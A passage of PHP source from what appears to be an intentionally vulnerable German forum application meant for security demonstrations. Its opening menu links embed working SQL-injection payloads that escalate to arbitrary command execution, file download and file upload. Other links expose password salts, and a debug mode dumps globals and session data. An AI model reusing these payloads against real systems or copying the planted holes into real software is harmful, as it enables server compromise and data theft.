<li><a title='Die PHP-Variabeln im Benutzerprofil anzeigen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"PHP-Variabeln\" as username,$sij[2]\"@@?~?a:$~{base}??@@\n??a:\${base}??\n\n@@?~?a:$~_SERVER[SERVER_SOFTWARE]??@@\n??x:\$_SERVER[SERVER_SOFTWARE]??\n\n@@<<~echo $~_SERVER[PATH]>>@@\n<<echo \$_SERVER[PATH]>>\n\n\n@@~<<~<echo $~_SERVER[SERVER_PORT]>>>@@\n<<<echo \$_SERVER[SERVER_PORT]>>>\n\n@@~|$~_SERVER[SERVER_NAME]|$~_SERVER[SERVER_ADDR]|@@\n|\$_SERVER[SERVER_NAME]|\$_SERVER[SERVER_ADDR]|\n\n@@~* $~_SERVER[DOCUMENT_ROOT]@@\n* \$_SERVER[DOCUMENT_ROOT]\n\n@@~; $~_SERVER[SCRIPT_FILENAME] ~: $~_SERVER[SCRIPT_NAME]@@\n; \$_SERVER[SCRIPT_FILENAME] : \$_SERVER[SCRIPT_NAME]\n\n@@[~b]$~_SERVER[HTTP_USER_AGENT][~/b]@@\n[b]\$_SERVER[HTTP_USER_AGENT][/b]\n\n$info[1]\" as profil")."'$atk>PHP-Variablen</a> ausgeben
<li><a title='Die PHP-Funktion phpinfo() im Benutzerprofil ausführen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"PHP-Info\" as username,$sij[2]\"??x:$\"||\"{@die(phpinfo())}??\n\n$info[1]\" as profil")."'$atk>PHP-Informationen</a> ausgeben
<li><a title='Beliebigen Programmbefehl auf dem Server ausführen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Code-Injection\" as username,$sij[2]\"??x:$\"||\"{@die(system(preg_replace('/^(?=.)/e','header(\'content-type: text/plain\')','echo')))}??\n\n$info[1]\" as profil")."' onClick='this.href=this.href.replace(/(echo)/g,prompt(\"Bitte geben Sie einen Befehl ein!\",\"ping localhost".((stristr($_SERVER['HTTP_USER_AGENT'],'linux')) ? " -c4" : '')."\"))'$atk>Beliebigen Programm-Befehl</a> ausführen
<li><a title='Beliebige Dateien auf dem Server herunterladen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"File-Download\" as username,$sij[2]\"??x:$\"||\"{@die(readfile(preg_replace(array('/^/e','/$/e'),array('header(\'content-type: application/octet-stream\')','header(\'Content-Disposition: filename=\'.chr(34).basename(\'down\').chr(34))'),'down')))}??\n\n$info[1]\" as profil")."' onClick='this.href=this.href.replace(/(down)/g,prompt(\"Bitte Download-Datei angeben!\",\"$base\"))'$atk>Datei-Download</a> vom Server für beliebige Dateien
<li><a title='Beliegige Dateien auf den Server hochladen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"File Upload\" as username,$sij[2]\"<form enctype='multipart/form-data' action='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Upload\" as username,$sij[2]\"??x:\${@die((move_uploaded_file(\$_FILES['file']['tmp_name'],getcwd().'/'.\$_FILES['file']['name']))?'<a href=\''.preg_replace('/\/.*$/','','$self').'/'.urlencode(\$_FILES['file']['name']).'\'>'.\$_FILES['file']['name'].'</a>':'Upload Fehlgeschlagen')}??\" as profil")."' method='post'><input type='file' name='file'><input type='submit'></form>\n\n$info[1]\" as profil")."'$atk>Datei-Upload</a> zum Server <small>(Dauerhaft)</small>
</li></ul></ol><ul><li><a class='wipe' href='$wiki/Administrator_(Rolle)'$tgb>Administrator Funktionen</a>: <small><a href='$self/Backup' title='Datenbank sichern und wiederherstellen'$rel$sel>Backup</a> / <a href='$self/CMS' title='Content-Management-System'$rel$sel>CMS</a> / <a href='$self/SQL' title='Vollständige und uneingeschränkte SQLite-Konsole'$rel$sel>SQL-Konsole</a> (Nur mit Admin-Rechten!)</small>
<li><a class='wipe' href='$wiki/Easter_Egg'$tgb>Versteckte Funktionen</a>: <small >
<a title='Creole-Schreibweise testen!' href='$self/Creole'$sel>Creole</a> /
<a title='Den vollständigen Quelltext des Forums anzeigen!' href='$self/source.txt'$sel>Quelltext</a> - <a title='Quelltext des Forums herunterladen!' href='$self/source.php.gz'$rel$sel>Download</a> /
<a title='Debugausgaben bei jeden Request mit ausgeben!' href='$self/Debug'$rel$sel>Debuginfos</a> /
<a title='Per Cookie die Ziel-Url für die Leak-Angriffe ändern!' href='#' onclick='".preg_replace($js,'',<<<eof
if(a = prompt("Bitte geben Sie ein ZielURL für die Angriffe ein!",((b = document.cookie.match(/(?:^|\s*;)to=(http:[^\s;#?]+)/)) ? b[1] : "$Self")))
if(b = a.match(/http:[^\s;#?]+/))
document.cookie = "to=" + b[0] + "; path=$self";
return false;
eof
)."'$rel$sel>LeakUrl ändern</a> /<br />
<a title='Persönline Benutzerfrage ausgeben' href='$self?ask=' onclick='return(a=prompt(\"Bitte geben Sie ein Benutzernamen".(($leak) ? "" : ":eMail")." ein!\",\"\"))?this.href+=a:false;'$rel$sel>Benutzerfrage</a> /
<a title='Password-Salt vom Benutzer ausgeben' href='$self?salt='$rel$sel onclick='return(a=prompt(\"Bitte geben Sie ein Benutzernamen ein!\",\"\"))?this.href+=a:false'>Pass-Salt</a> /
<a title='Ajax-Chat Funktion' href='$self/Chat?chat=html:0'$rel$sel>Chat-API</a> /
<a title='Alle Cookies dauerhaft Speichern (für 365 Tage)' href='$self/Cookie'$rel$sel>Cookie</a> /
<a title='Sicherheitslücken mit Cookies an/abschalten!' href='$self/Leak'$rel$sel>Sicherheits-Modus</a> /
<a title='Session-Variabeln Löschen/Anlegen' href='$self/set?' onclick='return(a=prompt(\"Bitte geben Sie ein Session-Wert ein! (key=value)\",\"\"))?this.href+=a:false'$rel$sel>Set Session</a> /
<a title='Nochmal Schreibzugriff versuchen!' href='$self/write'$rel$sel>WriteTest</a></small>".((isset($addon) and $addon)
? preg_replace('/\$\w+/e','@$0',"<li><a class='wipe' href='$wiki/Add-on'$tgb>Addon Funktionen</a>: <small>".$addon."</small>") : "")."</li></ul>
</fieldset></td></tr></table><div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),$val)."</div>" : "") : "");
# Layout
$line = ($uid) ? reset(($sql['aq']($conn,"select id,username,password from [user] where id=$uid"))) : false;
$out = "<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html><head><title>$title</title>
<meta name='robots' content='".(($craw) ? "all" : "noindex, nofollow")."'>\n<meta name='viewport' content='width=device-width, initial-scale=1' />"
.(($uid and $request != 'Chat' and !isset($_COOKIE['login'])) ? "\n<meta http-equiv='refresh' content='".(($eos+1)*60)."; URL=$self'>" : "")."
<meta http-equiv='content-type' content='text/html; charset=utf-8' />\n"
.(($icon) ? "<link href='$icon' rel='shortcut icon' />" : "")
.((!$local and !$inet and !$uid) ? "" : "<link rel='alternate' type='application/atom+xml' href='$self/Atom".(($uid) ? "?id=$uid.".$hash[0]("$line[username]:$line[password]") : '')."' title='Forumfeed".(($uid) ? " für $line[username]" : "")."' />\n")
.(($uedit) ? "<link rel='alternate' title='Inhalt Bearbeiten' href='$self/$uedit' type='application/x-wiki' />" : '')
.(($mid) ? "<link rel='alternate' type='application/atom+xml' href='$self/Atom/Blog/".($val = $sql['sq']($conn,"select username from user where id = $mid"))."' title='Blogfeed".(($uid) ? " von $val" : "")."' />\n" : "")
.(($css) ? "<link type='text/css' rel='stylesheet' href='$css' />\n"
: "<style type='text/css'><!-- .cr pre,.cr ol,.cr ul,.cr dl,.cr blockquote{margin-top:0;margin-bottom:0}.cr h1,.cr h2,.cr h3,.cr h4,.cr h5,.cr h6 {margin-top:0}.cr ol{padding-left:30}.cr ul{padding-left:20}.cr dt{font-weight:bold}.tl{margin-bottom:0;clear:both}.wipe{color:navy}.file{color:maroon}.self,.home{color:green}.anchor{color:darkgreen}.leak{color:red}.title{text-shadow:black 2px 1px 4px;font-size:2.5em;color:$stc;margin-top:0;margin-bottom:0}.shl{background-color:yellow}#debug ol{font-size:0.8em}--></style>\n")
.(($head) ? implode("\n",$head)."\n" : '')."</head><body>".(($logo) ? "<a href='$self'><img src='$logo' align='right' alt='Logo' title='$title' border='0' /></a>" : "")."
<h1 class='title'>$title</h1><table width='100%'><tr><td><a href='$self'>Startseite</a>"
.(($sql and $content and $status/2%2) ? " / <a href='$self/CMS'>CMS</a>" : "")
.((preg_match('/^([\w.-]+)\s?$/',$request,$var)) ? " / <a href='$self/$var[1]'>$var[1]</a>" : "")
.(($sql and $request == 'CMS' and isset($_GET['id']) and $id and count($_POST)) ? " <small><a href='#edit'>(edit)</a></small>" : "")
.(($sql and $content and ($status/2%2 or $status%4 == 1 and $sql['sq']($conn,"select status/2%4 from [cms] where name like '".trim($request)."'") >= 2 )) ? " <small><a href='$self/CMS?q=$request'>(edit)</a></small>"
: (($path and $mid and preg_match("!^/$request/([\w.-]+)$!",$path,$var)) ? " / <a href='$self/Profil/$var[1]'>$var[1]</a>" : ''))
."</td><td align='right'>".implode(' | ',array_unique(preg_replace('/(\w+).*/',"<a href='$self/$0'>$1</a>",
(($sql and ($local or $inet or $uid)) ? array_merge((array)$sql['sq']($conn,"select name from [cms] where name like '_%' and status%2 = 1 and status/2%4 <= ".($status/2%2 + $status%2*2)." order by name"),
((is_array($content)) ? array_keys($content) : array()),
(($uid and $status/2%2 and !$sql['sq']($conn,'select count(*) from forum where status is not null and mailid is not null')) ? array('CMS') : array()),
(($imps or $uid and $status/2%2) ? array('Impressum') : array()),
(($user and !$lone) ? array('Mitglieder') : array()),
(($var = $sql['aq']($conn,"
select count(*),count(b.id)
from forum as a
left join forum as b on a.id = b.id and ".(($uid) ? "b.userid = $uid" : "b.id is null")."
where a.mailid = a.userid and a.status is not null".(($uid) ? "" : " and a.status%2 = 0")) and $var[0][0]) ? array("Blog".(($var[0][1]) ? "/$line[username]" : "")) : array()),
array("Suche?$getopt")) : array('Impressum'))))).((isset($_SESSION['uid']) and $uid) ? (($request == 'Chat' or $status%2 and $sql['sq']($conn,"
select count(*)
from user
where status%2 = 1 and id != $uid")) ? " | <a href='$self/Chat'>Chat</a>" : '')." | <a href='$self/Datei'>Datei</a>".(($sql['sq']($conn,"
select count(*)
from forum
where mailid != userid and (userid = $uid or mailid = $uid)")) ? " | <a href='$self/Mail'>Mail</a>".preg_replace('!(\d+)(?=/)!',"<strong style='color:red'>\$1</strong>",(($var = $sql['sq']($conn,"
select ifnull(nullif(count(*)-count(r.id),0)||'/','')||count(*)
from [forum] as f
left join [forum] as r on r.id = f.id and r.status/2%2 = 1
where f.status is not null and f.mailid = $uid and f.mailid != f.userid")) ? " ($var)" : "")) : '')." | <a href='$self/Profil/".($val = ucfirst($line['username']))."'>Profil von $val</a> | <a href='$self/Abmelden'>Abmelden</a>" : '')."</td></tr></table><hr />
<script type='text/javascript'><!--\n".preg_replace($js,'',((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "
document.write(\"<input type='hidden' id='jspredebug' \/>\");
jsdebug = function() { // Debug-Helper
x = [arguments[0],new Date().toLocaleString().replace(/^.*?(\d+:\d+(?::\d+)).*?$/,'$1') + ':'];
x[1] += x[0];
if((x[2] = x[0].line) || (x[2] = x[0].lineNumber)) // Zeilennummer Ermitteln
x[1] += '\\x20(Line\\x20' + x[2] + ')';
if((x[2] = x[0].stack)) // Verbose Error-String
x[1] += '\\n' + x[2];
if((x[2] = document.getElementById('jsconsole')) && (x[3] = document.getElementById('jsdebugswitch')) && x[3].checked || (x[2] = document.getElementById('jspredebug'))) {
x[2].value += x[1] + '\\n';
x[2].scrollTop = x[2].scrollHeight;
if(x[2].style.display == 'none')
x[2].style.display = 'block';
}
else" : " jsdebug = function() {")."
if(typeof console != 'undefined')
console.log(arguments[0]);
return arguments[0];
};")."//--></script>".preg_replace('/(?<!<!---->)$/',"<br clear='all' />",strtr($out,$uml))
."<hr /><div align='right'><address onDblClick='location.href=\"$self\"'><small>© $date by $author</small></address></div>";
# Datenbank schließen
if($sql and $conn)
$sql['cl']($conn);
# Debug Ausgabe
if(($leak or $status/2%2 or $leak === 1) and (!$sql and isset($debug) or $request == 'Debug' or isset($_COOKIE['debug']) and $_COOKIE['debug'])) {
if(isset($_COOKIE['debug']) and $_COOKIE['debug']) {
if($request == 'Debug')
setcookie('debug',0,time()-$ctl,$self);
}
elseif($sql)
setcookie('debug',1,0,$self);
$out .= "<script type='text/javascript'><!--\n".preg_replace($js,'',"document.write(\"<small><a href='#' onclick='"
.strtr(preg_replace($jshide[0],$jshide[1],"debugconsole,3"),array('\\' => '\\\\', '"' => '\"'))
."'>Debug-Console<\/a><\/small><input type='checkbox' id='jsdebugswitch' title='Loggen ein\/ausschalten'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<3)%2) ? '' : " checked")
." \/>\\x20|\\x20<div id='debugconsole'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<3)%2) ? " style='display:none'" : '')
."><textarea cols='80' rows='10' style='width:100%;display:none' ondblclick='this.value=String();this.style.display=/none/.source' id='jsconsole' readonly><\/textarea><\/div>\");
x = document.getElementById('jspredebug');
if((y=document.getElementById('jsdebugswitch')) && y.checked) {
y = document.getElementById('jsconsole');
if(y.value += x.value)
y.style.display = 'block';
}
x.parentNode.removeChild(x);//--></script>");
if($var = ($leak === 1 and isset($_GET['GLOBALS'])) or isset($debug) or isset($sql['log']) or function_exists('error_get_last') and $val = error_get_last())
$out .= "<a href='#' onclick='".preg_replace($jshide[0],$jshide[1],"debug,4")."'><small>Debuginfos:</small></a> | <div"
.((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<4)%2) ? " style='display:none'" : '')." id='debug'>"
.(($val and is_array($val) and isset($val['message'])) ? "<b>PHP-Fehler:</b> $val[message] in $val[file] on line $val[line]<br>" : '')
.(($var or isset($debug) and $debug) ? "<pre style='white-space:pre-wrap'>".preg_replace('/^\w+\s+\(|\)$/','',strtr(print_r((($var) ? $GLOBALS : $debug),true),$html))."</pre>" : "")
.((isset($sql['log'])) ? $sql['log'] : "")."</div>";
if(isset($_SESSION)) // Keine Fremden Sessiondaten anzeigen
foreach($_SESSION as $key => $var)
if(preg_match($dpsk,$key) or $leak === 1)
$__SESSION[$key] = $var;
$html = array_merge($html,array("\n" => "<br />", " " => " "));
$val = array('GET','POST','FILES','COOKIE','_SESSION');
foreach($val as $key => $var)
if(isset(${"_$var"}) and count(${"_$var"}) > 0)
$val[$key] = str_replace('_','',"<td valign='top'><b><a href='#' onclick='".preg_replace($jshide[0],$jshide[1],"$var,".(5+$key))."'>$var</a></b><br /><small id='$var'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<(5+$key))%2) ? " style='display:none'" : '').">").strtr(print_r(${"_$var"},true),$html).'</small></td>';
else
unset($val[$key]);
$row = array();
foreach($_SERVER as $key => $var)
if(preg_match('/^(HTTP|RE(MOTE|QUEST|DIRECT))_|_(INFO|UR[IL])$/',$key) or $leak === 1)
$row[$key] = $var;
ksort($row);
$out .= "<a href='#' onclick='".preg_replace($jshide[0],$jshide[1],"dinfo,11")."'><small>Debug-Tabelle:</small></a><table width='100%' border='1' id='dinfo'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<11)%2) ? " style='display:none'" : '')."><tr>".((count($val) > 0) ? implode('',$val)."</tr><tr><td valign='top' colspan='".count($val)."'>" : '<td>')
."<b><a href='#' onclick='".preg_replace($jshide[0],$jshide[1],"http,10")."'>HTTP Header</a></b><br /><small id='http'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<10)%2) ? " style='display:none'" : '').">".strtr(print_r($row,true),$html)."</small></td></tr></table>";
}
# End of Line
@header('Content-Type: text/html; charset=UTF-8');
die("$out</body></html>");
?>